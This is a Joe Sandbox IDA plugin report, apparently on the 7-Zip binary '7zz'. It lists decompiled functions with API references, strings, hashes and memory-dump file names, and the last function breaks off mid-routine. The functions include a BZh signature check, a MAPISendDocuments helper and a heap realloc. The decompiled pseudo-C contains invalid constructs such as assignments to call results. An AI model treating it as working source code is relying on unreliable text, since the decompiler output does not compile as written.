0x004061bc
0x004061be
0x004061c1
0x004061c4
0x004061cb
0x004061cd
0x004061cd
0x004061cf
0x004061d2
0x004061d7
0x004061d9
0x004061dc
0x004061e1
0x004061e3
0x004061e3
0x004061e5
0x004061e8
0x004061e9
0x004061e3
0x004061f7
0x004061ff
0x00406208
0x0040620b
0x0040620e
0x00406214

APIs

__aulldiv.LIBCMT ref: 00406107

Strings

, xrefs: 0040615D
%, xrefs: 00406125
, xrefs: 004061B5

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: __aulldiv
String ID: $ $%
API String ID: 3732870572-114112156
Opcode ID: 5f3be3b97577a96593b7eed08c3f672e33e18b0ddb9a91ce93faccb85b3d0260
Instruction ID: b857c6e470453704c1f0b52f1adfc20138d148c1cd609403c8723782e6e4065e
Opcode Fuzzy Hash: 5f3be3b97577a96593b7eed08c3f672e33e18b0ddb9a91ce93faccb85b3d0260
Instruction Fuzzy Hash: 5241B531B007089BDB24CE69D891AAAB7F6EF88304F14853ED546E7382EB34AD18C754

Uniqueness

Uniqueness Score: -1.00%

Function 0041CC41 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0041CC41() {
				void* _t29;
				void* _t35;
				intOrPtr* _t36;
				void* _t45;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr* _t49;
				void* _t51;
				void* _t53;

				E0046B890(E00475648, _t51);
				 *(_t51 - 4) =  *(_t51 - 4) & 0x00000000;
				_t49 =  *((intOrPtr*)(_t51 + 8));
				 *(_t51 - 4) = 1;
				 *((intOrPtr*)(_t51 - 0x10)) = _t53 - 0xc;
				 *((intOrPtr*)( *_t49 + 0x10))(_t49, _t45, _t48, _t35);
				_t46 =  *((intOrPtr*)(_t51 + 0xc));
				_t36 = _t49 + 0x28;
				_t29 =  *((intOrPtr*)( *_t46 + 0x10))(_t46, 0, 0, 1, _t36);
				_t56 = _t29;
				if(_t29 == 0) {
					_t29 = E0040FAC0(_t56, 3);
					if(_t29 == 0) {
						if( *((char*)(_t51 + 8)) != 0x42 ||  *((char*)(_t51 + 9)) != 0x5a ||  *((char*)(_t51 + 0xa)) != 0x68) {
							_t29 = 1;
						} else {
							_t29 =  *((intOrPtr*)( *_t46 + 0x10))(_t46, 0, 0, 2, _t51 - 0x18);
							if(_t29 == 0) {
								 *((char*)(_t49 + 0x30)) = 1;
								asm("sbb ecx, [ebx+0x4]");
								 *((intOrPtr*)(_t49 + 0x20)) =  *((intOrPtr*)(_t51 - 0x18)) -  *_t36;
								 *((intOrPtr*)(_t49 + 0x24)) =  *((intOrPtr*)(_t51 - 0x14));
								E0040C9B4(_t49 + 0x14, _t46);
								E0040C9B4(_t49 + 0x18, _t46);
								_t29 = 0;
							}
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t51 - 0xc));
				return _t29;
			}

0x0041cc46
0x0041cc4e
0x0041cc54
0x0041cc58
0x0041cc5e
0x0041cc62
0x0041cc65
0x0041cc68
0x0041cc75
0x0041cc78
0x0041cc7a
0x0041cc83
0x0041cc8a
0x0041cc90
0x0041cce5
0x0041cc9e
0x0041ccab
0x0041ccb0
0x0041ccbb
0x0041ccbf
0x0041ccc2
0x0041ccc5
0x0041cccb
0x0041ccd4
0x0041ccd9
0x0041ccd9
0x0041ccb0
0x0041cc90
0x0041cc8a
0x0041ccf8
0x0041cd01

APIs

__EH_prolog.LIBCMT ref: 0041CC46

Strings

B, xrefs: 0041CC8C
Z, xrefs: 0041CC92
h, xrefs: 0041CC98

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog
String ID: B$Z$h
API String ID: 3519838083-418080759
Opcode ID: e27ca44641f6d3a39d7cf6b47e3b5a49e6ed396509ae319c0575fe9804f9460e
Instruction ID: 95da72c9e758c624e4a23e77763632c46c0b47913da8fea83fca01b435c30606
Opcode Fuzzy Hash: e27ca44641f6d3a39d7cf6b47e3b5a49e6ed396509ae319c0575fe9804f9460e
Instruction Fuzzy Hash: 3621C771640604FFDB20CF24CC81BEE7BA4BF45B04F14451EF906AB281E3B4AA44C795

Uniqueness

Uniqueness Score: -1.00%

Function 004065F1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E004065F1(void* __ecx) {
				intOrPtr* _t29;
				void* _t32;
				void* _t47;
				void* _t53;

				E0046B890(E00473548, _t53);
				_t47 = __ecx;
				 *(_t53 - 0x10) = 0x490a88;
				EnterCriticalSection(0x490a88);
				 *(_t53 - 4) =  *(_t53 - 4) & 0x00000000;
				E00415C6D(_t47 + 0x60,  *((intOrPtr*)(_t53 + 0xc)));
				E00403532(_t53 - 0x1c,  *((intOrPtr*)(_t53 + 8)));
				_push(_t53 - 0x1c);
				 *(_t53 - 4) = 1;
				E00406796(_t47 + 0x4c);
				 *(_t53 - 4) =  *(_t53 - 4) & 0x00000000;
				E00407A18( *((intOrPtr*)(_t53 - 0x1c)));
				_t48 = _t47 + 8;
				E00406000(_t47 + 8);
				E004060BD(_t48);
				E0040608D(_t48, "WARNING: ");
				_t29 = E00404B09(_t53 - 0x1c,  *((intOrPtr*)(_t53 + 0xc)));
				 *(_t53 - 4) = 2;
				E004060A5(_t48,  *_t29);
				E00407A18( *((intOrPtr*)(_t53 - 0x1c)));
				LeaveCriticalSection(0x490a88);
				_t32 = 1;
				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
				return _t32;
			}

0x004065f6
0x00406605
0x00406608
0x0040660b
0x00406614
0x0040661b
0x00406626
0x00406631
0x00406632
0x00406636
0x0040663e
0x00406642
0x00406648
0x0040664d
0x00406654
0x00406660
0x0040666b
0x00406674
0x00406678
0x00406680
0x00406687
0x00406692
0x00406695
0x0040669d

APIs

__EH_prolog.LIBCMT ref: 004065F6
EnterCriticalSection.KERNEL32(00490A88), ref: 0040660B

Part of subcall function 00406796: __EH_prolog.LIBCMT ref: 0040679B

Part of subcall function 00404B09: __EH_prolog.LIBCMT ref: 00404B0E

LeaveCriticalSection.KERNEL32(00490A88,?,?,?), ref: 00406687

Strings

WARNING: , xrefs: 00406659

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog$CriticalSection$EnterLeave
String ID: WARNING:
API String ID: 2490926211-3509524770
Opcode ID: e677357eb5a156d3394904b572896e19ad0289c2689fd6f0e6c99c1e536d9e68
Instruction ID: 4da438c53a722fe7a77adf22add2750a6654a71b2c88e06f60811bef9031d0d9
Opcode Fuzzy Hash: e677357eb5a156d3394904b572896e19ad0289c2689fd6f0e6c99c1e536d9e68
Instruction Fuzzy Hash: 95118F31E00149ABDB05FF65D846BEDBB79AF90318F10802EF406772D2DB7C1A159B9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041AA2D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041AA2D(void* __ebx, void* __ecx, void* __edx, void* __edi) {
				void* _t121;
				void* _t124;

				E0046B8F4(0, 0);
				__eax = GetProcAddress( *(__ebp + 0x14), "MAPISendDocuments");
				__eflags = __eax - __ebx;
				 *(__ebp + 8) = __eax;
				if(__eax != __ebx) {
					__ecx = __ebp - 0x138;
					__eax = E0041B927(__ebp - 0x138);
					__eflags =  *((intOrPtr*)(__esi + 0x20)) - __ebx;
					 *(__ebp - 4) = 0x28;
					 *(__ebp + 0xc) = __ebx;
					if(__eflags <= 0) {
						L8:
						__ecx = __ebp - 0x168;
						__eax = E0041B838(__ebp - 0x168, __edi, __eflags);
						__esi = 0;
						__eflags =  *((intOrPtr*)(__ebp - 0x130)) - __ebx;
						 *(__ebp - 4) = 0x2b;
						if( *((intOrPtr*)(__ebp - 0x130)) > __ebx) {
							do {
								__eax =  *(__ebp - 0x12c);
								__ecx = __ebp - 0x144;
								__eax = E004039C0(__ebp - 0x144,  *((intOrPtr*)( *(__ebp - 0x12c) + __esi * 4)));
								__edx = __ebp - 0x144;
								__ecx = __ebp - 0xec;
								 *(__ebp - 4) = 0x2c;
								__eax = E00408963(__ebp - 0x144);
								__edx = __ebp - 0x144;
								__ecx = __ebp - 0x150;
								 *(__ebp - 4) = 0x2d;
								__eax = E0041AE3F();
								__edx = __ebp - 0xec;
								__ecx = __ebp - 0x15c;
								 *(__ebp - 4) = 0x2e;
								__eax = E0041AE3F();
								 *(__ebp - 4) = 0x2f;
								 *(__ebp + 8)(__ebx, ";",  *(__ebp - 0x150),  *(__ebp - 0x15c), __ebx) = E00407A18( *(__ebp - 0x15c));
								E00407A18( *(__ebp - 0x150)) = E00407A18( *(__ebp - 0xec));
								 *(__ebp - 4) = 0x2b;
								__eax = E00407A18( *(__ebp - 0x144));
								__esi = __esi + 1;
								__eflags = __esi -  *((intOrPtr*)(__ebp - 0x130));
							} while (__esi <  *((intOrPtr*)(__ebp - 0x130)));
						}
						__ecx = __ebp - 0x168;
						 *(__ebp - 4) = 0x28;
						__eax = E0041B875(__ebp - 0x168);
						__ecx = __ebp - 0x138;
						 *(__ebp - 4) = 0x27;
						__eax = E004036A1(__ebp - 0x138);
						__ecx = __ebp + 0x14;
						 *(__ebp - 4) = 0x15;
						__eax = E0040960A(__ebp + 0x14);
						__ecx = __ebp - 0x4c;
						 *(__ebp - 4) = 0x11;
						__eax = E0041BA22(__ebp - 0x4c);
						__ecx = __ebp - 0x78;
						 *(__ebp - 4) = 0x10;
						__eax = E0041AE89(__ebp - 0x78);
						__ecx = __ebp - 0x88;
						 *(__ebp - 4) = 0xf;
						E0041AE59(__ebp - 0x88) = E00407A18( *((intOrPtr*)(__ebp - 0x38)));
						 *(__ebp - 4) = 4;
						__ecx = __ebp - 0x1b8;
						E004102DF(__ebp - 0x1b8, __eflags) = E00407A18( *((intOrPtr*)(__ebp - 0x2c)));
						 *(__ebp - 4) =  *(__ebp - 4) | 0xffffffff;
						__ecx = __ebp - 0x124;
						E00403411(__ebp - 0x124) = 0;
						__eflags = 0;
					} else {
						while(1) {
							__eax =  *(__esi + 0x24);
							__ecx =  *(__ebp + 0xc);
							__eax =  *( *(__esi + 0x24) +  *(__ebp + 0xc) * 4);
							__ecx = __ebp - 0x20;
							__ebx =  *( *(__esi + 0x24) +  *(__ebp + 0xc) * 4) + 0xc;
							E0040351A(__ebp - 0x20) = __ebp - 0xec;
							__ecx =  *( *(__esi + 0x24) +  *(__ebp + 0xc) * 4) + 0xc;
							_push(__ebp - 0xec);
							 *(__ebp - 4) = 0x29;
							__eax = E0041ACE8( *( *(__esi + 0x24) +  *(__ebp + 0xc) * 4) + 0xc, __edx, __eflags);
							__eax =  *__eax;
							__edx = __ebp - 0x20;
							__ecx = __eax;
							 *(__ebp - 4) = 0x2a;
							__eax = E0040A5AF();
							 *(__ebp - 4) = 0x29;
							asm("sbb bl, bl");
							__eax = E00407A18( *(__ebp - 0xec));
							__eflags =  ~__al + 1;
							if( ~__al + 1 != 0) {
								break;
							}
							__eax = __ebp - 0x20;
							__ecx = __ebp - 0x138;
							_push(__ebp - 0x20);
							__eax = E00406796(__ebp - 0x138);
							 *(__ebp - 4) = 0x28;
							__eax = E00407A18( *(__ebp - 0x20));
							 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
							__eax =  *(__ebp + 0xc);
							__eflags =  *(__ebp + 0xc) -  *((intOrPtr*)(__esi + 0x20));
							if( *(__ebp + 0xc) <  *((intOrPtr*)(__esi + 0x20))) {
								continue;
							} else {
								__ebx = 0;
								__eflags = 0;
								goto L8;
							}
							goto L12;
						}
						__eax = GetLastError();
						__ecx =  &(__edi[7]);
						 *__edi = __eax;
						E00403593( &(__edi[7]), L"GetFullPathName error") = E00407A18( *(__ebp - 0x20));
						 *(__ebp - 4) = 0x27;
						__ecx = __ebp - 0x138;
						__eax = E004036A1(__ecx);
						goto L14;
					}
				} else {
					 *__edi = GetLastError();
					_push(L"7-Zip cannot find MAPISendDocuments function");
					E00403593(__edi + 0x1c);
					L14:
					 *(_t121 - 4) = 0x15;
					E0040960A(_t121 + 0x14);
					 *(_t121 - 4) = 0x11;
					E0041BA22(_t121 - 0x4c);
					 *(_t121 - 4) = 0x10;
					E0041AE89(_t121 - 0x78);
					 *(_t121 - 4) = 0xf;
					E0041AE59(_t121 - 0x88);
					E00407A18( *((intOrPtr*)(_t121 - 0x38)));
					 *(_t121 - 4) = 4;
					E004102DF(_t121 - 0x1b8, _t124);
					E00407A18( *((intOrPtr*)(_t121 - 0x2c)));
					 *(_t121 - 4) =  *(_t121 - 4) | 0xffffffff;
					E00403411(_t121 - 0x124);
				}
				L12:
				 *[fs:0x0] =  *((intOrPtr*)(_t121 - 0xc));
				return 0x80004005;
			}

0x0041aa31
0x0041aa3e
0x0041aa44
0x0041aa46
0x0041aa49
0x0041aa5a
0x0041aa60
0x0041aa65
0x0041aa68
0x0041aa6c
0x0041aa6f
0x0041aaf0
0x0041aaf0
0x0041aaf6
0x0041aafb
0x0041aafd
0x0041ab03
0x0041ab07
0x0041ab0d
0x0041ab0d
0x0041ab13
0x0041ab1c
0x0041ab21
0x0041ab27
0x0041ab2d
0x0041ab31
0x0041ab36
0x0041ab3c
0x0041ab42
0x0041ab46
0x0041ab4b
0x0041ab51
0x0041ab57
0x0041ab5b
0x0041ab61
0x0041ab80
0x0041ab96
0x0041aba1
0x0041aba5
0x0041abad
0x0041abae
0x0041abae
0x0041ab0d
0x0041abba
0x0041abc0
0x0041abc4
0x0041abc9
0x0041abcf
0x0041abd3
0x0041abd8
0x0041abdb
0x0041abdf
0x0041abe4
0x0041abe7
0x0041abeb
0x0041abf0
0x0041abf3
0x0041abf7
0x0041abfc
0x0041ac02
0x0041ac0e
0x0041ac14
0x0041ac18
0x0041ac26
0x0041ac2b
0x0041ac30
0x0041ac3b
0x0041ac3b
0x0041aa71
0x0041aa71
0x0041aa71
0x0041aa74
0x0041aa77
0x0041aa7a
0x0041aa7d
0x0041aa85
0x0041aa8b
0x0041aa8d
0x0041aa8e
0x0041aa92
0x0041aa97
0x0041aa99
0x0041aa9c
0x0041aa9e
0x0041aaa2
0x0041aaa9
0x0041aab5
0x0041aab9
0x0041aabe
0x0041aac1
0x00000000
0x00000000
0x0041aac7
0x0041aaca
0x0041aad0
0x0041aad1
0x0041aad6
0x0041aadd
0x0041aae2
0x0041aae6
0x0041aae9
0x0041aaec
0x00000000
0x0041aaee
0x0041aaee
0x0041aaee
0x00000000
0x0041aaee
0x00000000
0x0041aaec
0x0041ac4e
0x0041ac54
0x0041ac57
0x0041ac66
0x0041ac6c
0x0041ac70
0x0041ac76
0x00000000
0x0041ac76
0x0041aa4b
0x0041aa51
0x0041aa53
0x0041aa23
0x0041ac7b
0x0041ac7e
0x0041ac82
0x0041ac8a
0x0041ac8e
0x0041ac96
0x0041ac9a
0x0041aca5
0x0041aca9
0x0041acb1
0x0041acb7
0x0041acc1
0x0041acc9
0x0041acce
0x0041acd9
0x0041acde
0x0041ac3d
0x0041ac42
0x0041ac4b

APIs

Part of subcall function 0046B8F4: RaiseException.KERNEL32(0047CF70,?,00405CA1,?,?,?,0047CF70,?,?,?,00405CA1), ref: 0046B922

GetProcAddress.KERNEL32(?,MAPISendDocuments), ref: 0041AA3E
GetLastError.KERNEL32 ref: 0041AA4B

Part of subcall function 0040960A: FreeLibrary.KERNEL32(00000000,?,0040963A,?,?,00409660,00000000), ref: 00409614

Part of subcall function 0041BA22: __EH_prolog.LIBCMT ref: 0041BA27

Part of subcall function 0041AE89: __EH_prolog.LIBCMT ref: 0041AE8E

Part of subcall function 0041AE59: __EH_prolog.LIBCMT ref: 0041AE5E

Part of subcall function 004102DF: __EH_prolog.LIBCMT ref: 004102E4

Part of subcall function 00403411: __EH_prolog.LIBCMT ref: 00403416

Strings

7-Zip cannot find MAPISendDocuments function, xrefs: 0041AA53
MAPISendDocuments, xrefs: 0041AA36

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog$AddressErrorExceptionFreeLastLibraryProcRaise
String ID: 7-Zip cannot find MAPISendDocuments function$MAPISendDocuments
API String ID: 2771415571-2393093766
Opcode ID: 436d9d764f620074e47213211ef523a00970a49056743576426d4f87afc21c29
Instruction ID: 292e67d6ab7125016d89913b4f1d38c64d53d2453e5fd5feb3a7f6d712afac38
Opcode Fuzzy Hash: 436d9d764f620074e47213211ef523a00970a49056743576426d4f87afc21c29
Instruction Fuzzy Hash: AA11C130905248EADB01EFA4D9457DCBB70AF15358F2044AFE106731D2DB781A98DB6B

Uniqueness

Uniqueness Score: -1.00%

Function 00471F76 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(00496224), ref: 00471F9C
InterlockedDecrement.KERNEL32(00496224), ref: 00471FB1

Strings

$bI, xrefs: 00471F95

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: Interlocked$DecrementIncrement
String ID: $bI
API String ID: 2172605799-2563688255
Opcode ID: 14794fd947a66a7e740a79147c95f718189372345e86d1cd971f01589f6869bf
Instruction ID: f620e85f8d82dfbac1e457229ba36f5d0a3130eb6314d64e12aaba347fa3cd4d
Opcode Fuzzy Hash: 14794fd947a66a7e740a79147c95f718189372345e86d1cd971f01589f6869bf
Instruction Fuzzy Hash: 0BF0C232105242ABE720BFAEACC5DDB6795FB91719F10883FF008851A0D7689985951E

Uniqueness

Uniqueness Score: -1.00%

Function 00470DBD Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00470DBD(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t19;

				InterlockedIncrement(0x496224);
				_t19 =  *0x496220; // 0x0
				if(_t19 != 0) {
					InterlockedDecrement(0x496224);
					E0046E56A(0x13);
					_push(1);
					_pop(0);
				}
				_a8 = E00470E16(_a4, _a8);
				if(0 == 0) {
					InterlockedDecrement(0x496224);
				} else {
					E0046E5CB(0x13);
				}
				return _a8;
			}

0x00470dc9
0x00470dd7
0x00470ddd
0x00470de0
0x00470de4
0x00470dea
0x00470dec
0x00470dec
0x00470df9
0x00470dff
0x00470e0c
0x00470e01
0x00470e03
0x00470e08
0x00470e15

APIs

InterlockedIncrement.KERNEL32(00496224), ref: 00470DC9
InterlockedDecrement.KERNEL32(00496224), ref: 00470DE0

Part of subcall function 0046E56A: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0046FF49,00000009,00000000,00000000,00000001,0046E3A8,00000001,00000074,?,?,00000000,00000001), ref: 0046E5A7
Part of subcall function 0046E56A: EnterCriticalSection.KERNEL32(?,?,?,0046FF49,00000009,00000000,00000000,00000001,0046E3A8,00000001,00000074,?,?,00000000,00000001), ref: 0046E5C2

InterlockedDecrement.KERNEL32(00496224), ref: 00470E0C

Strings

$bI, xrefs: 00470DC2

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: Interlocked$CriticalDecrementSection$EnterIncrementInitialize
String ID: $bI
API String ID: 2038102319-2563688255
Opcode ID: efb15d606f5e44fd71a55acc674efbc2999dbd389be6925d70f36fac0792ac87
Instruction ID: a29c1fd973d67cf1eab9a1632a1b120ecfaf970aee40f0b8d32a81a5239f5549
Opcode Fuzzy Hash: efb15d606f5e44fd71a55acc674efbc2999dbd389be6925d70f36fac0792ac87
Instruction Fuzzy Hash: AAF0B436102119FEEB102B96AC419CF7798EF44728F11843FF508491519B745A818999

Uniqueness

Uniqueness Score: -1.00%

Function 00458600 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00458600() {
				signed int _t4;

				_t4 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetLargePageMinimum");
				if(_t4 != 0) {
					_t4 =  *_t4();
					if(_t4 != 0) {
						_t1 = _t4 - 1; // -1
						if((_t4 & _t1) == 0) {
							 *0x491560 = _t4;
							return _t4;
						}
					}
				}
				return _t4;
			}

0x00458611
0x00458619
0x0045861b
0x0045861f
0x00458621
0x00458626
0x00458628
0x00000000
0x00458628
0x00458626
0x0045861f
0x0045862d

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetLargePageMinimum,00403B70,?,?,00000000,00000001,00000000), ref: 0045860A
GetProcAddress.KERNEL32(00000000), ref: 00458611

Strings

GetLargePageMinimum, xrefs: 00458600
kernel32.dll, xrefs: 00458605

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetLargePageMinimum$kernel32.dll
API String ID: 1646373207-2515562745
Opcode ID: e945a4318dcfde84d8dda7067848fc9038098bba741c81babacb23e338e356e1
Instruction ID: 187617de4669a97dd730b08bbbb79d285659c800799f683955411e203a0e4393
Opcode Fuzzy Hash: e945a4318dcfde84d8dda7067848fc9038098bba741c81babacb23e338e356e1
Instruction Fuzzy Hash: C4D0C7F0741316569B145BB15C4C77F3654AB94743B4444BF6806D1191EF29D504CB1D

Uniqueness

Uniqueness Score: -1.00%

Function 0046C94A Relevance: 6.5, APIs: 5, Instructions: 278
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0046C94A(void* _a4, long _a8) {
				signed int _v8;
				intOrPtr _v20;
				long _v36;
				void* _v40;
				intOrPtr _v44;
				char _v48;
				long _v52;
				long _v56;
				char _v60;
				intOrPtr _t56;
				void* _t57;
				long _t58;
				long _t59;
				long _t63;
				long _t66;
				long _t68;
				long _t71;
				long _t72;
				long _t74;
				long _t78;
				intOrPtr _t80;
				void* _t83;
				long _t85;
				long _t88;
				void* _t89;
				long _t91;
				intOrPtr _t93;
				void* _t97;
				void* _t104;
				long _t113;
				long _t116;
				intOrPtr _t122;
				void* _t123;

				_push(0xffffffff);
				_push(0x47c878);
				_push(E0046CE74);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t122;
				_t123 = _t122 - 0x28;
				_t97 = _a4;
				_t113 = 0;
				if(_t97 != 0) {
					_t116 = _a8;
					__eflags = _t116;
					if(_t116 != 0) {
						_t56 =  *0x496584; // 0x1
						__eflags = _t56 - 3;
						if(_t56 != 3) {
							__eflags = _t56 - 2;
							if(_t56 != 2) {
								while(1) {
									_t57 = 0;
									__eflags = _t116 - 0xffffffe0;
									if(_t116 <= 0xffffffe0) {
										__eflags = _t116 - _t113;
										if(_t116 == _t113) {
											_t116 = 1;
										}
										_t116 = _t116 + 0x0000000f & 0xfffffff0;
										__eflags = _t116;
										_t57 = HeapReAlloc( *0x496580, _t113, _t97, _t116);
									}
									__eflags = _t57 - _t113;
									if(_t57 != _t113) {
										goto L64;
									}
									__eflags =  *0x493730 - _t113; // 0x0
									if(__eflags == 0) {
										goto L64;
									}
									_t58 = E0046E8D6(_t116);
									__eflags = _t58;
									if(_t58 != 0) {
										continue;
									}
									goto L63;
								}
								goto L64;
							}
							__eflags = _t116 - 0xffffffe0;
